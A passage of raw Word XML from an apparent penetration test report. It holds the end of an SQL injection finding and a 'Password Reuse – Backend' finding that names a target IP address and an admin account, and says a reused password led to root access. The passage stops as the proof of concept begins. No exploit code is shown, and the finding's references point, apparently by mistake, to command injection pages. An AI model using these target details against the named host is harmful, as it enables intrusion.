                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>mysql</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>_real_escape_string</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>()</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16DFC913" w14:textId="77777777" w:rsidR="000F6F1C" w:rsidRPr="002355AE" w:rsidRDefault="000F6F1C" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Further references: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C4FE3EE" w14:textId="62BB0512" w:rsidR="000F6F1C" w:rsidRPr="002355AE" w:rsidRDefault="000F6F1C" w:rsidP="000F6F1C">
            <w:pPr>
              <w:pStyle w:val="Listenabsatz"/>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId18" w:history="1">
              <w:r w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>https://www.php.net/manual/en/security.database.sql-injection.php</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="73454F6C" w14:textId="3BBE5EBA" w:rsidR="000F6F1C" w:rsidRPr="002355AE" w:rsidRDefault="000F6F1C" w:rsidP="000F6F1C">
            <w:pPr>
              <w:pStyle w:val="Listenabsatz"/>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId19" w:history="1">
              <w:r w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>https://www.php.net/manual/en/pdo.prepared-statements.php</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="439024C7" w14:textId="1144E196" w:rsidR="000F6F1C" w:rsidRPr="002355AE" w:rsidRDefault="000F6F1C" w:rsidP="000F6F1C">
            <w:pPr>
              <w:pStyle w:val="Listenabsatz"/>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId20" w:history="1">
              <w:r w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>https://www.php.net/manual/en/function.mysql-real-escape-string.php</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="3210D989" w14:textId="1A8EED12" w:rsidR="000F6F1C" w:rsidRPr="002355AE" w:rsidRDefault="000F6F1C" w:rsidP="000F6F1C">
            <w:pPr>
              <w:pStyle w:val="Listenabsatz"/>
              <w:keepNext/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="7"/>
              </w:numPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId21" w:history="1">
              <w:r w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>https://www.php.net/manual/en/mysqli.quickstart.prepared-statements.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="213E9098" w14:textId="77777777" w:rsidR="0035074C" w:rsidRPr="002355AE" w:rsidRDefault="0035074C" w:rsidP="008809DD">
      <w:pPr>
        <w:pStyle w:val="Finding"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78088424" w14:textId="77777777" w:rsidR="0035074C" w:rsidRPr="002355AE" w:rsidRDefault="0035074C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Calibri" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3C3AA2" w14:textId="0E2608AB" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="0035074C" w:rsidP="0035074C">
      <w:pPr>
        <w:pStyle w:val="berschrift3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc119794114"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Password Reuse</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008809DD" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Backend</w:t>
      </w:r>
      <w:r w:rsidR="008809DD" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HIGH)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10080"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72"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="008809DD" w:rsidRPr="002355AE" w14:paraId="041A107E" w14:textId="77777777" w:rsidTr="0035074C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="00A257DC" w14:textId="77777777" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="008809DD" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Description:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="117B4241" w14:textId="77777777" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="00B43491" w:rsidP="00B43491">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Password reuse is a problem where people try to remember multiple passwords for everything they interact with on a regular basis, but instead use the same password on multiple systems, tiers of applications, or even social sites.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="353E06A9" w14:textId="77777777" w:rsidR="00B43491" w:rsidRPr="002355AE" w:rsidRDefault="00B43491" w:rsidP="00B43491">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>If a password is compromised, it can be correlated by username or email address to other services that are potentially using the same password, thus propagating the threat.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5ACDEA0E" w14:textId="77777777" w:rsidR="00B43491" w:rsidRPr="002355AE" w:rsidRDefault="00B43491" w:rsidP="00B43491">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Every system, every application, and every service should have a unique password all the way down to every router, switch, and IP camera in an organization.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4597747A" w14:textId="77777777" w:rsidR="00B43491" w:rsidRPr="002355AE" w:rsidRDefault="00B43491" w:rsidP="00B43491">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Administrators should consider secure password storage solutions with automatic rotation of passwords and workflow.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F1141E6" w14:textId="1ABA2AE5" w:rsidR="00B43491" w:rsidRPr="002355AE" w:rsidRDefault="00B43491" w:rsidP="00B43491">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>In this case a password of an admin user was found on the system. It was possible to determine that this password is used multiple times throughout the system. Because of that escalating the privileges root (user with highest permissions) was possible in a short time.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006234C2" w:rsidRPr="002355AE" w14:paraId="192B0B25" w14:textId="77777777" w:rsidTr="0035074C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="76F75B0E" w14:textId="77777777" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Impact:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C68F129" w14:textId="77777777" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="0035074C" w:rsidP="006234C2">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">High </w:t>
            </w:r>
            <w:r w:rsidR="006234C2" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>7.5</w:t>
            </w:r>
            <w:r w:rsidR="006234C2" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">) </w:t>
            </w:r>
            <w:r w:rsidR="006234C2" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>|</w:t>
            </w:r>
            <w:r w:rsidR="006234C2" w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId22" w:anchor="CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" w:history="1">
              <w:r w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:b/>
                  <w:bCs/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="0A6D2B84" w14:textId="0D8164AC" w:rsidR="0035074C" w:rsidRPr="002355AE" w:rsidRDefault="0035074C" w:rsidP="0035074C">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>This vulnerability can be exploited fully remote without any prior knowledge of the underlying system</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, but for that first the credentials belonging to the user </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>johnsysadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>have to</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> be discovered</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006234C2" w:rsidRPr="002355AE" w14:paraId="5084C662" w14:textId="77777777" w:rsidTr="0035074C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="23575A04" w14:textId="77777777" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>System:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="Gitternetztabelle4Akzent2"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="2694"/>
              <w:gridCol w:w="2694"/>
              <w:gridCol w:w="2694"/>
            </w:tblGrid>
            <w:tr w:rsidR="006234C2" w:rsidRPr="002355AE" w14:paraId="221D587F" w14:textId="77777777" w:rsidTr="00875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650A5DE" w14:textId="77777777" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
                  <w:pPr>
                    <w:keepNext/>
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="002355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>IP address</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2694" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="7EF7E9A5" w14:textId="77777777" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
                  <w:pPr>
                    <w:keepNext/>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r w:rsidRPr="002355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Port</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2694" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="07CB6CE6" w14:textId="77777777" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
                  <w:pPr>
                    <w:keepNext/>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r w:rsidRPr="002355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>Protocol</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
            <w:tr w:rsidR="006234C2" w:rsidRPr="002355AE" w14:paraId="6DE66EA4" w14:textId="77777777" w:rsidTr="0087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D8C8AA" w14:textId="77777777" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
                  <w:pPr>
                    <w:keepNext/>
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="002355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:b w:val="0"/>
                      <w:bCs w:val="0"/>
                      <w:szCs w:val="24"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>13.40.105.124</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2694" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="49971B5E" w14:textId="5ACE4712" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="0035074C" w:rsidP="006234C2">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2355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>-</w:t>
                  </w:r>
                </w:p>
              </w:tc>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="2694" w:type="dxa"/>
                </w:tcPr>
                <w:p w14:paraId="4501B76B" w14:textId="77777777" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
                  <w:pPr>
                    <w:keepNext/>
                    <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="002355AE">
                    <w:rPr>
                      <w:rFonts w:cs="Times New Roman"/>
                      <w:lang w:val="en-US"/>
                    </w:rPr>
                    <w:t>TCP</w:t>
                  </w:r>
                </w:p>
              </w:tc>
            </w:tr>
          </w:tbl>
          <w:p w14:paraId="6925218B" w14:textId="77777777" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006234C2" w:rsidRPr="002355AE" w14:paraId="751EDD7A" w14:textId="77777777" w:rsidTr="0035074C">
        <w:trPr>
          <w:trHeight w:val="413"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="10BB853B" w14:textId="77777777" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C2F8390" w14:textId="78297A24" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP Command Injection: </w:t>
            </w:r>
            <w:hyperlink r:id="rId23" w:history="1">
              <w:r w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>https://owasp.org/www-community/attacks/Command_Injection</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04F2E3EE" w14:textId="6A3FB687" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="006234C2" w:rsidP="006234C2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PortSwigger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> OS command injection: </w:t>
            </w:r>
            <w:hyperlink r:id="rId24" w:history="1">
              <w:r w:rsidRPr="002355AE">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:cs="Times New Roman"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>https://portswigger.net/web-security/os-command-injection</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C237E1E" w14:textId="77777777" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="008809DD" w:rsidP="008809DD">
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38AA14D9" w14:textId="77777777" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="008809DD" w:rsidP="008809DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exploitation Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB5AFA9" w14:textId="77777777" w:rsidR="00B43491" w:rsidRPr="002355AE" w:rsidRDefault="00B43491" w:rsidP="00B43491">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">For the service of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mosquitto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the password </w:t>
      </w:r>
